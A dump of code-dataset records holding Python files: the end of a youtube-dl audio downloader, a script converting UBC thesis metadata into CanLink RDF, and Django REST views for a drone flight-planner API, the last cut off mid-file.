res = os.system(f'youtube-dl -x --audio-format wav {shareAddressTwo}')\n print(f\"2 try:{res}\")\n\n afterDown = os.listdir(f'{mp3Dir}')\n\n #===============다운로드 후에, 동기화 등의 결과 처리=============================\n for i in os.listdir(f'{mp3Dir}'):\n if i not in beforeDown:\n os.rename(i, f'{song}_{singer}.wav')\n sb_sql.down_song(song, singer, filetype) #save mysql\n sbl.sync_song() #song\n sbs.make_singerDic() #singer\n\n time.sleep(20)\n\n os.chdir(f'{baseDir}')\n if res != 0: #mp3 다운받지 못함\n myDriver.quit()\n myDriver.close()\n return f\"res:{res}\"\n else:\n myDriver.quit()\n myDriver.close()\n return f\"res:{res}\"\n\n #===============try,except 다운로드 시도 실패 시=================================\n except Exception as msg:\n os.chdir(f'{baseDir}')\n myDriver.quit()\n myDriver.close()\n return f\"res:{res}\"\n","sub_path":"WIN/youtb_converterWAV.py","file_name":"youtb_converterWAV.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558853443","text":"from rdflib import URIRef, Graph, Literal, Namespace\nfrom rdflib.namespace import RDF, FOAF, DC, SKOS, RDFS, OWL\nimport urllib.parse\nimport re\nfrom urllib.request import urlopen, urlparse\nfrom bs4 import BeautifulSoup\nimport ssl\nimport pickle\nimport hashlib\nimport unidecode\nimport difflib\nimport sys\nimport os\nimport csv\nimport datetime\nimport urllib.request\nfrom langdetect import detect\nfrom io import StringIO, BytesIO\nfrom PyPDF2.pdf import PdfFileReader\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\ncontext = ssl._create_unverified_context()\ninput_graph = Graph()\ng = Graph() # output graph\n\nDC = Namespace(\"http://purl.org/dc/terms/\")\nREL = Namespace(\"http://id.loc.gov/vocabulary/relators/\")\nBIBO = Namespace(\"http://purl.org/ontology/bibo/\")\nSCHEMA = Namespace(\"http://schema.org/\")\nFRBR = Namespace(\"http://purl.org/vocab/frbr/core#\")\nCWRC = Namespace(\"http://sparql.cwrc.ca/ontologies/genre#\")\nPROV = Namespace(\"http://www.w3.org/ns/prov#\")\nCLDI = Namespace(\"http://canlink.library.ualberta.ca/ontologies/canlink#\")\nDOAP = Namespace(\"http://usefulinc.com/ns/doap#\")\nVOID = Namespace(\"http://rdfs.org/ns/void#\")\n\ng.bind(\"dc\", DC)\ng.bind(\"foaf\", FOAF)\ng.bind(\"rdf\", RDF)\ng.bind(\"rel\", REL)\ng.bind(\"frbr\", FRBR)\ng.bind(\"bibo\", BIBO)\ng.bind(\"schema\", SCHEMA)\ng.bind(\"skos\", SKOS)\ng.bind(\"rdfs\", RDFS)\ng.bind(\"owl\", OWL)\ng.bind(\"cwrc\", CWRC)\ng.bind(\"prov\", PROV)\ng.bind(\"cldi\", CLDI)\ng.bind(\"doap\", DOAP)\ng.bind(\"void\", VOID)\n\nwith open(\"files/subjects.pickle\", \"rb\") as handle:\n subjects = pickle.load(handle)\n\n\ndef getDegreeUri(degree):\n if not degree:\n return None\n\n if \"in\" in degree.split():\n degree = \" \".join(degree.split()[:degree.split().index(\"in\")])\n\n if \",\" in degree:\n degree = \" \".join(degree[:degree.index(\",\")].split())\n\n if \"-\" in degree:\n degree = \" \".join(degree[:degree.index(\"-\")])\n\n degree = ''.join([i for i in degree if i.isalpha()]).lower()\n uri = None\n label = None # label = MSc for degree = msc\n\n # check for longer sentences if the keywords aren't available\n degrees = {\"masterofscience\": [\"MSc\", \"http://purl.org/ontology/bibo/degrees/ms\"],\n \"masterofarts\": [\"MA\", \"http://purl.org/ontology/bibo/degrees/ma\"],\n \"masteroffinearts\": [\"MFA\", \"http://canlink.library.ualberta.ca/thesisDegree/mfa\"],\n \"masterofappliedscience\": [\"MASc\", \"http://canlink.library.ualberta.ca/thesisDegree/masc\"],\n \"masteroflaws\": [\"LLM\", \"http://canlink.library.ualberta.ca/thesisDegree/llm\"],\n \"masterofenvironmentalstudies\": [\"MEnv\", \"http://canlink.library.ualberta.ca/thesisDegree/menv\"],\n \"masterofeducation\": [\"MEd\", \"http://canlink.library.ualberta.ca/thesisDegree/med\"],\n \"masterofnursing\": [\"MN\", \"http://canlink.library.ualberta.ca/thesisDegree/mn\"],\n \"masterofarchitecture\": [\"MArch\", \"http://canlink.library.ualberta.ca/thesisDegree/march\"],\n \"masterofmathematics\": [\"MMath\", \"http://canlink.library.ualberta.ca/thesisDegree/mmath\"],\n \"masterofhealthstudies\": [\"MHStud\", \"http://canlink.library.ualberta.ca/thesisDegree/mhstud\"],\n \"masterofcounselling\": [\"MCoun\", \"http://canlink.library.ualberta.ca/thesisDegree/mcoun\"],\n \"masterofengineering\": [\"MEng\", \"http://canlink.library.ualberta.ca/thesisDegree/meng\"],\n \"masterofadvancedstudies\": [\"MAS\", \"http://canlink.library.ualberta.ca/thesisDegree/mas\"],\n \"masterofphysicaleducation\": [\"MPhysEd\", \"http://canlink.library.ualberta.ca/thesisDegree/mphysed\"],\n \"masterofbusinessadministration\": [\"MBA\", \"http://canlink.library.ualberta.ca/thesisDegree/mba\"],\n \"masterofworshipstudies\": [\"MWS\", \"http://canlink.library.ualberta.ca/thesisDegree/mws\"],\n \"doctorofphilosophy\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n \"doctoralthesis\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n \"doctorofbusinessadministration\": [\"DBA\", \"http://canlink.library.ualberta.ca/thesisDegree/dba\"],\n \"doctorofscience\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n \"doctor\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"]}\n\n\n if \"master\" in degree or \"doctor\" in degree:\n match = difflib.get_close_matches(\n degree, degrees.keys(), n=1, cutoff=0.90)\n if match:\n return(degrees[match[0]][0], degrees[match[0]][1])\n\n # # NOTE modification just for this dataset\n # if \"-\" in degree:\n # label = degree.split(\"-\")[1]\n # return([label, \"http://canlink.library.ualberta.ca/thesisDegree/\"+label.lower()])\n # # TODO IMPLEMENT A USER INPUT FOR THE DEGREES THAT CAN'T BE FOUND (MUSIC)\n #\n # return([input(\"Enter Label for \" + degree + \": \"), \"http://canlink.library.ualberta.ca/thesisDegree/\"+input(\"Enter Code for \" + degree + \": \")])\n\n if \"master\" in degree:\n return([\"Master\", \"http://canlink.library.ualberta.ca/thesisDegree/master\"])\n return([\"PhD\", \"http://canlink.library.ualberta.ca/thesisDegree/phd\"])\n\n # do the basic ones\n degree_codes = {\n \"maîtrise\":[\"Master\", \"http://canlink.library.ualberta.ca/thesisDegree/master\"],\n \"mphysed\":[\"MPhysEd\", \"http://canlink.library.ualberta.ca/thesisDegree/mphysed\"],\n \"menvsc\":[\"MEnv\", \"http://canlink.library.ualberta.ca/thesisDegree/menv\"],\n \"mdent\":[\"MDent\", \"http://canlink.library.ualberta.ca/thesisDegree/mdent\"],\n \"maît\":[\"Master\", \"http://canlink.library.ualberta.ca/thesisDegree/master\"],\n \"maed\":[\"MAEd\", \"http://canlink.library.ualberta.ca/thesisDegree/maed\"],\n \"meng\":[\"MEng\", \"http://canlink.library.ualberta.ca/thesisDegree/meng\"],\n \"mdes\":[\"MDes\", \"http://canlink.library.ualberta.ca/thesisDegree/mdes\"],\n \"dent\":[\"MDent\", \"http://canlink.library.ualberta.ca/thesisDegree/mdent\"],\n \"masc\":[\"MASc\", \"http://canlink.library.ualberta.ca/thesisDegree/masc\"],\n \"msc\":[\"MSc\", \"http://purl.org/ontology/bibo/degrees/ms\"],\n \"llm\":[\"LLM\", \"http://canlink.library.ualberta.ca/thesisDegree/llm\"],\n \"lld\":[\"LLD\", \"http://canlink.library.ualberta.ca/thesisDegree/lld\"],\n \"mws\":[\"MWS\", \"http://canlink.library.ualberta.ca/thesisDegree/mws\"],\n \"mhk\":[\"MHK\", \"http://canlink.library.ualberta.ca/thesisDegree/mhk\"],\n \"mpp\":[\"MPP\", \"http://canlink.library.ualberta.ca/thesisDegree/mpp\"],\n \"mba\":[\"MBA\", \"http://canlink.library.ualberta.ca/thesisDegree/mba\"],\n \"mfa\":[\"MFA\", \"http://canlink.library.ualberta.ca/thesisDegree/mfa\"],\n \"sjd\":[\"SJD\", \"http://canlink.library.ualberta.ca/thesisDegree/sjd\"],\n \"edd\":[\"EDD\", \"http://canlink.library.ualberta.ca/thesisDegree/edd\"],\n \"med\":[\"MEd\", \"http://canlink.library.ualberta.ca/thesisDegree/med\"],\n \"phd\":[\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n \"dba\":[\"DBA\", \"http://canlink.library.ualberta.ca/thesisDegree/dba\"],\n \"dsc\":[\"DSc\", \"http://canlink.library.ualberta.ca/thesisDegree/dsc\"],\n \"des\":[\"Des\", \"http://canlink.library.ualberta.ca/thesisDegree/des\"],\n \"msw\":[\"MSW\", \"http://canlink.library.ualberta.ca/thesisDegree/msw\"],\n \"ma\":[\"MA\", \"http://purl.org/ontology/bibo/degrees/ma\"],\n \"mn\":[\"MN\", \"http://canlink.library.ualberta.ca/thesisDegree/mn\"],\n \"docteur\":[\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"]\n }\n\n for code in degree_codes:\n if code in degree:\n return(degree_codes[code][0], degree_codes[code][1])\n\n\ndef getPDFUrl(url):\n try:\n html_object = urlopen(url, context=context)\n html_doc = html_object.read()\n soup = BeautifulSoup(html_doc, \"html.parser\")\n\n pdf_url = \"\"\n # find all the .pdf links in the page\n for link in soup.find_all(\"a\"):\n l = link.get(\"href\")\n if \"pdf\" in str(l):\n pdf_url = str(l)\n\n contentUrl = pdf_url\n # convert relative links to absolute links if necessary\n if pdf_url and \"http\" not in pdf_url and \"www\" not in pdf_url:\n redirect_url = html_object.geturl()\n if pdf_url[0] == \"/\":\n # append to the base of the redirect url\n base_url = '{uri.scheme}://{uri.netloc}'.format(\n uri=urlparse(redirect_url))\n contentUrl = base_url + pdf_url\n else:\n # append to the end of the redirect url\n contentUrl = redirect_url + pdf_url\n\n return contentUrl\n except:\n return None\n\n\nstart_time = datetime.datetime.now().isoformat()[:-7] + \"Z\"\nruntime = \"http://canlink.library.ualberta.ca/runtime/\"+hashlib.md5(start_time.encode()).hexdigest()\n\nreader = csv.reader(open(\"files/ubc.csv\", \"r\", encoding=\"latin-1\"))\nnext(reader) # skip the title\nfor row in reader:\n subject_uris = {}\n author = None\n degree = None\n title = None\n url = None\n degree_uri = None\n degree_label = None\n contentUrl = None\n manifestation = None\n date = None\n language = None\n abstract = None\n advisor = None\n num_pages = None\n\n\n author = max(row[0], row[1])\n try:\n date = int(row[2])\n except:\n date = None\n\n degree = row[3]\n\n # if the abstract isn't available then message goes in [ ]\n if row[4] and row[4][0] != \"[\" and row[4][-1] != \"]\" and len(row[4]) > 30:\n abstract = row[4].replace(\"\\n\", \"\")\n else:\n abstract = None\n url = row[5]\n contentUrl = getPDFUrl(url)\n\n try:\n r = requests.get(contentUrl)\n f = BytesIO(r.content)\n num_pages = PdfFileReader(f).getNumPages()\n print(num_pages)\n except:\n pass\n\n\n if row[6]:\n language = \"http://id.loc.gov/vocabulary/languages/\" + row[6]\n\n subject_names = [i for i in row[7].split(\"||\")+row[8].split(\"||\") if i]\n subject_uris = {}\n for subject in subject_names:\n if subject.lower() in subjects.keys():\n subject_uris[subject] = subjects[subject.lower()]\n else:\n subject_uris[subject] = None\n\n title = row[9]\n\n author_uri = row[10]\n if not author_uri and row[11]: author_uri = row[11]\n if not author_uri and row[12]: author_uri = row[12]\n\n university_uri = \"http://dbpedia.org/resource/University_of_British_Columbia\"\n\n\n if not title or not language or not degree or not author or not date:\n print(\"ERROR\\n\\n\\n\\n\\n\")\n\n\n uri = \"http://canlink.library.ualberta.ca/thesis/\"+str(hashlib.md5((str(author).encode(\"utf-8\") + str(title).encode(\"utf-8\"))).hexdigest())\n\n if contentUrl:\n manifestation = \"http://canlink.library.ualberta.ca/manifestation/\"+hashlib.md5(contentUrl.encode(\"utf-8\")).hexdigest()\n else:\n print(contentUrl, \"\\n\\n\")\n degree_label, degree_uri = getDegreeUri(degree)\n\n\n print(\"-\"*50)\n print(\"Author:\", author)\n print(\"Date:\", date)\n print(\"Degree:\", degree)\n print(\"URL:\", url)\n print(\"Content Url:\", contentUrl)\n print(\"Language:\", language)\n print(\"Subjects:\", subject_names)\n print(\"Subjects Uris:\", subject_uris)\n print(\"Title:\", title)\n print(\"Author_uri:\", author_uri)\n print(\"University:\", university_uri)\n print(\"Manifestation:\", manifestation)\n\n # title\n g.add((URIRef(uri), DC.title, Literal(title)))\n g.add((URIRef(uri), PROV.wasGeneratedBy, URIRef(runtime)))\n g.add((URIRef(uri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n # sameAs for the original handle url\n if url:\n g.add((URIRef(uri), OWL.sameAs, URIRef(url)))\n # date\n g.add((URIRef(uri), DC.issued, Literal(date, datatype=\"http://www.w3.org/2001/XMLSchema#gYear\")))\n # language\n g.add((URIRef(uri), DC.language, URIRef(language)))\n # degree\n g.add((URIRef(uri), BIBO.degree, URIRef(degree_uri)))\n g.add((URIRef(degree_uri), RDF.type, BIBO.thesisDegree))\n g.add((URIRef(degree_uri), RDFS.label, Literal(degree_label)))\n g.add((URIRef(degree_uri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n\n if \"canlink.library.ualberta.ca\" not in author_uri:\n provided_uri = author_uri\n author_uri = \"http://canlink.library.ualberta.ca/person/\"+str(hashlib.md5(author.encode(\"utf-8\")+university_uri.encode(\"utf-8\")).hexdigest())\n g.add((URIRef(author_uri), OWL.sameAs, URIRef(provided_uri)))\n\n g.add((URIRef(uri), DC.creator, URIRef(author_uri)))\n g.add((URIRef(uri), REL.aut, URIRef(author_uri)))\n # author type\n g.add((URIRef(author_uri), RDF.type, FOAF.Person))\n g.add((URIRef(author_uri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n g.add((URIRef(author_uri), PROV.wasGeneratedBy, URIRef(runtime)))\n # author name\n if \",\" in author:\n g.add((URIRef(author_uri), FOAF.lastName, Literal(author.split(\",\")[0].strip())))\n g.add((URIRef(author_uri), FOAF.firstName, Literal(author.split(\",\")[1].strip())))\n # add the full name in there as well for consistency\n g.add((URIRef(author_uri), FOAF.name, Literal(author.strip().replace(\",\",\"\"))))\n else:\n g.add((URIRef(author_uri), FOAF.name, Literal(author.strip())))\n\n # abstract\n if abstract:\n abstract_language = detect(abstract)\n g.add((URIRef(uri), BIBO.abstract, Literal(abstract, lang=abstract_language)))\n # publisher\n g.add((URIRef(uri), DC.publisher, URIRef(university_uri)))\n g.add((URIRef(uri), REL.pub, URIRef(university_uri)))\n # thesis types\n g.add((URIRef(uri), RDF.type, FRBR.Work))\n g.add((URIRef(uri), RDF.type, FRBR.Expression))\n g.add((URIRef(uri), RDF.type, SCHEMA.creativeWork))\n g.add((URIRef(uri), RDF.type, BIBO.thesis))\n g.add((URIRef(uri), CWRC.hasGenre, CWRC.genreScholarship))\n # subjects\n if subject_uris:\n for subject in subject_uris:\n # check if we have the uri for it - we made a dictionary and set the value to None if we couldn't find a uri\n if subject_uris[subject]:\n g.add((URIRef(uri), DC.subject, URIRef(subject_uris[subject])))\n else:\n # the subject uri couldn't be found for this\n newSubjectUri = \"http://canlink.library.ualberta.ca/subject/\" + hashlib.md5(subject.lower().encode(\"utf-8\")).hexdigest()\n\n g.add((URIRef(newSubjectUri), RDF.type, SKOS.Concept))\n g.add((URIRef(newSubjectUri), RDFS.label, Literal(subject.lower())))\n g.add((URIRef(newSubjectUri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n g.add((URIRef(uri), DC.subject, URIRef(newSubjectUri)))\n g.add((URIRef(newSubjectUri), PROV.wasGeneratedBy, URIRef(runtime)))\n # manifestation\n if manifestation:\n g.add((URIRef(manifestation), SCHEMA.encodesCreativeWork, URIRef(uri)))\n if contentUrl:\n g.add((URIRef(manifestation), SCHEMA.contentUrl, URIRef(contentUrl)))\n g.add((URIRef(manifestation), RDF.type, FRBR.Manifestation))\n g.add((URIRef(manifestation), RDF.type, SCHEMA.MediaObject))\n g.add((URIRef(manifestation), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n g.add((URIRef(manifestation), PROV.wasGeneratedBy, URIRef(runtime)))\n\n if num_pages:\n g.add((URIRef(uri), BIBO.numPages, Literal(str(num_pages))))\n\nend_time = datetime.datetime.now().isoformat()[:-7] + \"Z\"\ng.add((URIRef(runtime), PROV.startedAtTime, Literal(start_time)))\ng.add((URIRef(runtime), PROV.endedAtTime, Literal(end_time)))\ng.add((URIRef(runtime), PROV.activity, CLDI.marclodconverter))\ng.add((URIRef(runtime), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\ng.add((URIRef(runtime), RDF.type, PROV.Activity))\ng.add((URIRef(runtime), RDF.type, PROV.Generation))\ng.add((URIRef(runtime), PROV.actedOnBehalfOf, URIRef(\"http://canlink.library.ualberta.ca/ontologies/canlink#MaharshPatel\")))\n\n\nprint(g.serialize(format=\"xml\").decode(\"utf-8\"))\ng.serialize(\"ubc.xml\", format=\"xml\")\n # print(\"Abstract: \", abstract)\n","sub_path":"scripts/canlink-data/code/website/processing/ubc.py","file_name":"ubc.py","file_ext":"py","file_size_in_byte":16710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148409260","text":"import coreapi\nfrom django.core.files.storage import default_storage\nfrom django_filters import rest_framework as django_filters\nfrom django.core import serializers as s\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.utils import dateparse\nfrom django.conf import settings\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.core.validators import validate_email\nfrom django.db.models import Count, Case, Value, When\nfrom django.db.models.functions import Lower\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import send_mail\nfrom django.db.models.query_utils import Q\nfrom django.template import loader\nfrom django.http import JsonResponse\nfrom django.db import IntegrityError\nfrom django.http import Http404\n\nfrom datetime import datetime\nfrom datetime import time\n\nfrom rest_framework import viewsets\nfrom rest_framework import generics\nfrom rest_framework import mixins\nfrom rest_framework import status\nfrom rest_framework.decorators import action, detail_route, list_route, api_view, renderer_classes, permission_classes, authentication_classes\nfrom rest_framework.permissions import IsAuthenticated, SAFE_METHODS, AllowAny\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.schemas import AutoSchema, SchemaGenerator\nfrom rest_framework.reverse import reverse\nfrom rest_framework_swagger.renderers import OpenAPIRenderer, SwaggerUIRenderer\n\nfrom planner import assessment\nfrom planner import models\nfrom planner import serializers\nfrom planner import tasks\n\nimport waffle\n\nrouter = DefaultRouter()\nexternal_router = DefaultRouter(trailing_slash=False)\nassessment = assessment.Assess()\n\nclass BaseViewset(mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet):\n pass\n\n\nclass IsOperator(IsAuthenticated):\n def has_object_permission(self, request, view, obj):\n return (hasattr(obj, 'operator') and\n request.user.is_authenticated and\n request.user.operator == obj.operator)\n\nclass IsOperatorForAssessment(IsAuthenticated):\n def has_object_permission(self, request, view, obj):\n return (hasattr(request.user, 'operator') and\n request.user.is_authenticated and\n request.user.operator == obj.flight_plan.operator)\n\nclass IsOperatorOrReadOnly(IsOperator):\n def has_permission(self, request, view):\n return True # We only want to limit object-level permission here\n\n def has_object_permission(self, request, view, obj):\n return (request.method in SAFE_METHODS or\n super(IsOperatorOrReadOnly, self).has_object_permission(request, view, obj))\n\nclass IsExperimentalUser(IsAuthenticated):\n def has_permission(self, request, view):\n return waffle.flag_is_active(request, 'experimental_api')\n\n def has_object_permission(self, request, view, obj):\n is_authenticated = request.user.is_authenticated\n return is_authenticated and waffle.flag_is_active(request, 'experimental_api')\n\n\nclass Vehicles(BaseViewset):\n serializer_class = serializers.VehicleSerializer\n permission_classes = (IsOperatorOrReadOnly,)\n filter_fields = ('state', 'operator', 'vehicle_type', 'manufacturer')\n queryset = models.Vehicle.objects.all()\n\n def filter_queryset(self, queryset):\n queryset = super(Vehicles, self).filter_queryset(queryset)\n user = self.request.user\n\n # For non-public pages each operator can only see the vehicles registered under it's own account.\n if user.is_authenticated:\n queryset = queryset.exclude(~Q(operator=user.operator))\n\n return queryset.order_by('-created_at')\n\n\n def is_serial_number_valid(self, serial_number):\n # Checks if the vehicle with the serial number exists in their deactivated list\n if models.Vehicle.objects.filter(\n operator=self.request.user.operator,\n serial_number=serial_number,\n state=models.Vehicle.STATE_INACTIVE\n ).exists():\n return False\n else:\n return True\n\n\n def create(self, request):\n serializer = self.serializer_class(data=self.request.data)\n if serializer.is_valid():\n serial_number = serializer.validated_data.get('serial_number')\n if self.is_serial_number_valid(serial_number):\n return super(Vehicles, self).create(request)\n else:\n vehicle_id = models.Vehicle.objects.get(\n operator=self.request.user.operator,\n serial_number=serial_number,\n state=models.Vehicle.STATE_INACTIVE\n ).id\n return Response({'message': \"Vehicle exists with the same serial number\", \"vehicle_id\": vehicle_id}, 422)\n else:\n return Response(serializer.errors)\n\n\nrouter.register(r'vehicles', Vehicles, base_name='vehicle')\n\n\nclass AutoSchemaWithExtraFields(AutoSchema):\n def get_pagination_fields(self, path, method):\n fields = super(AutoSchemaWithExtraFields, self).get_pagination_fields(path, method)\n if path.endswith(\"uploads/init/\") or path.endswith(\"set_upload_complete/\"):\n fields += [\n coreapi.Field(\"id\", location=\"query\", description=\"The flight plan id\", required=True),\n coreapi.Field(\"type\", location=\"query\", description=\"The type of file to be uploaded (waypoints/telemetry).\", required=True),\n coreapi.Field(\"filename\", location=\"query\", description=\"The name of the file to be uploaded.\", required=True),\n coreapi.Field(\"size\", location=\"query\", description=\"The size of the file (in bytes) to be uploaded.\", required=True)\n ]\n\n if path.endswith(\"uploads/\") and method == 'POST':\n fields.append(coreapi.Field(\"timestamp\", location=\"query\", description=\"The timestamp you got with the upload URL\", required=True))\n\n if path.endswith(\"uploads/\") and method == 'GET':\n fields += [\n coreapi.Field(\"id\", location=\"query\", description=\"The WaypointMetadata id\", required=True),\n coreapi.Field(\"type\", location=\"query\", description=\"The type of file to be uploaded (waypoints/telemetry).\", required=True),\n ]\n\n # For Search\n if path.endswith(\"search_flights/\"):\n fields += [\n coreapi.Field(\"date_start\", location=\"query\", description=\"The start date\",),\n coreapi.Field(\"date_end\", location=\"query\", description=\"The end date\",),\n coreapi.Field(\"operator_id\", location=\"query\", description=\"The operator id\",),\n # coreapi.Field(\"timezone\", location=\"query\", description=\"Timezone\",),\n ]\n\n return fields\n\n\nclass FlightPlanFilterSet(django_filters.FilterSet):\n planned_departure_time_from = django_filters.DateTimeFilter(\n field_name='planned_departure_time', lookup_expr='gte')\n planned_departure_time_to = django_filters.DateTimeFilter(\n field_name='planned_departure_time', lookup_expr='lte')\n planned_arrival_time_from = django_filters.DateTimeFilter(\n field_name='planned_arrival_time', lookup_expr='gte')\n planned_arrival_time_to = django_filters.DateTimeFilter(\n field_name='planned_arrival_time', lookup_expr='lte')\n\n state = django_filters.BaseInFilter()\n\n class Meta:\n model = models.FlightPlan\n fields = [\n 'operator', 'vehicle', 'state',\n 'planned_departure_time_from', 'planned_departure_time_to',\n 'planned_arrival_time_from', 'planned_arrival_time_to'\n ]\n\n\nclass FlightPlans(BaseViewset):\n serializer_class = serializers.FlightPlanPostSerializer\n permission_classes = (IsOperatorOrReadOnly, )\n filter_class = FlightPlanFilterSet\n queryset = models.FlightPlan.objects.all().exclude(state=models.FlightPlan.STATE_DELETED)\n schema = AutoSchemaWithExtraFields()\n\n def filter_queryset(self, queryset):\n queryset = super(FlightPlans, self).filter_queryset(queryset)\n user = self.request.user\n\n # For non-public pages each operator can only see the flight plans registered under it's own account.\n if user.is_authenticated:\n queryset = queryset.exclude(~Q(operator=user.operator))\n\n return queryset.order_by('-planned_departure_time')\n\n def get_serializer_class(self):\n if self.request.method == 'GET':\n return serializers.FlightPlanGetSerializer\n else:\n return serializers.FlightPlanPostSerializer\n\n @detail_route(methods=['get'], permission_classes=[IsOperator])\n def invalidate_flight_plan(self, request, *args, **kwargs):\n \"\"\"\n Endpoint to invalidate flight plan\n \"\"\"\n flightplan = self.get_object()\n if flightplan:\n flightplan.state = models.FlightPlan.STATE_INVALID\n flightplan.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n\n @detail_route(methods=['delete'], permission_classes=[IsOperator])\n def waypoint(self, request, *args, **kwargs):\n \"\"\"\n Endpoint to remove waypoint\n \"\"\"\n flightplan = self.get_object()\n if flightplan:\n wp = flightplan.waypoints\n flightplan.waypoints = None\n wp.delete()\n flightplan.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n return Response({\"error\": \"Invalid flight plan.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n def _get_telemetry(self, fp, fields=None, filter=None):\n if fields is None:\n fields = ('time', 'latitude', 'longitude', 'altitude', 'batt', 'voltage')\n query = fp.telemetry.telemetries\n if filter:\n query = query.filter(filter)\n query = query.order_by('time')\n # whitelist fields for extraction\n serial = s.serialize('python', query, fields=fields)\n return [d['fields'] for d in serial]\n\n @detail_route(methods=['get'], url_name=\"download-telemetry\")\n def download_telemetry(self, request, *args, **kwargs):\n \"\"\"\n Endpoint to download telemetry\n \"\"\"\n try:\n fp = self.get_object()\n except models.FlightPlan.DoesNotExist:\n raise Http404(\"Flight plan does not exist\")\n telemetry_list = []\n if fp.telemetry:\n telemetry_list = self._get_telemetry(fp)\n resp = JsonResponse({'telemetry': telemetry_list}, content_type='application/json')\n resp[\"Content-Disposition\"] = \"attachment; filename=\\\"telemetry_\" + fp.id + \".json\\\"\"\n return resp\n\n @list_route(methods=['post'], permission_classes=[IsOperator], url_path='uploads/init')\n def uploads_init(self, request, *args, **kwargs):\n id = request.data['params']['id'] or None\n type = request.data['params']['type'] or None\n path = None\n if type == 'waypoints':\n path = models.document_path(request.user.operator, request.data['params']['filename'])\n elif type == 'telemetry':\n flightplan = models.FlightPlan.objects.get(pk=id)\n\n if request.user.operator != flightplan.operator:\n return Response({'error': \"Unauthorized\"}, status=401)\n\n path = models.document_path(flightplan, request.data['params']['filename'])\n if path:\n origin = \"http://localhost:3000\" if settings.LOCAL_DEV else \"%s://%s\" % (request.scheme, request.get_host())\n return Response(data={\n \"upload_url\": default_storage.bucket.blob(path['path']).create_resumable_upload_session(\n size=int(request.data['params']['size']),\n origin=origin),\n \"timestamp\": path['timestamp']\n })\n return Response({\"error\": \"Unknown type or id specified.\"}, status=404)\n\n @list_route(methods=['post', 'get'], permission_classes=[IsOperator])\n def uploads(self, request, *args, **kwargs):\n if (request.method == 'POST'):\n id = request.data['params']['id'] or None\n try:\n fp = models.FlightPlan.objects.get(pk=id)\n\n if request.user.operator != fp.operator:\n return Response({'error': \"Unauthorized\"}, status=401)\n\n except models.FlightPlan.DoesNotExist:\n # on new flight plans, a temporary invalid ID\n fp = None\n type = request.data['params']['type'] or None\n path = None\n if type == 'waypoints':\n path = models.document_path(\n request.user.operator,\n request.data['params']['filename'],\n timestamp=request.data['params']['timestamp']\n )\n wm = models.WaypointMetadata.objects.create(\n operator=request.user.operator,\n path=path['path'],\n flight_plan=fp\n )\n tasks.process_waypoints.delay(wm.id)\n return Response({\n \"success\": True,\n \"wm_id\": wm.id,\n \"url\": reverse(\"planner:plan-uploads\", request=request)+\"?id=%s&type=%s\" % (wm.id, 'waypoints')\n }, status=200)\n elif type == 'waypoints_array':\n # Validate data\n for waypoint in request.data['params']['waypoints']:\n data = {\n 'order': waypoint['order'],\n 'latitude': waypoint['latitude'],\n 'longitude': waypoint['longitude'],\n 'altitude_relative': waypoint['altitude_relative'],\n 'altitude': waypoint['altitude'],\n }\n\n serializer = serializers.WaypointSerializer(data=data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # Create task\n wm = models.WaypointMetadata.objects.create(\n operator=request.user.operator,\n path=None,\n flight_plan=fp,\n )\n tasks.process_waypoints.delay(wm.id, request.data['params']['waypoints'])\n return Response({\n \"success\": True,\n \"wm_id\": wm.id,\n \"url\": reverse(\"planner:plan-uploads\", request=request)+\"?id=%s&type=%s\" % (wm.id, 'waypoints')\n }, status=200)\n elif type == 'telemetry':\n path = models.document_path(\n fp,\n request.data['params']['filename'],\n timestamp=request.data['params']['timestamp']\n )\n tm = models.TelemetryMetadata.objects.create(\n flight_plan=fp,\n path=path['path'],\n state=models.TelemetryMetadata.STATE_UPLOADED\n )\n tasks.process_telemetry.delay(fp.id, tm.id)\n return Response({\n \"success\": True,\n \"tm_id\": tm.id,\n \"url\": reverse(\"planner:plan-uploads\", request=request)+\"?id=%s&type=%s\" % (tm.id, 'telemetry')\n }, status=200)\n if path is None or default_storage.exists(path['path']) is False:\n return Response({\"error\": \"Unable to find uploaded file\"}, status=400)\n return Response({\"error\": \"There's no flight plan with id %d\" % id}, status=404)\n elif request.method == 'GET':\n id = request.GET['id'] or None\n type = request.GET['type'] or None\n if type == 'waypoints':\n wm = models.WaypointMetadata.objects.get(id=id)\n if wm is None:\n Response({\"error\": \"Not found\"}, status=404)\n return Response({\"success\": True, \"id\": id, \"type\": type, \"state\": wm.state, 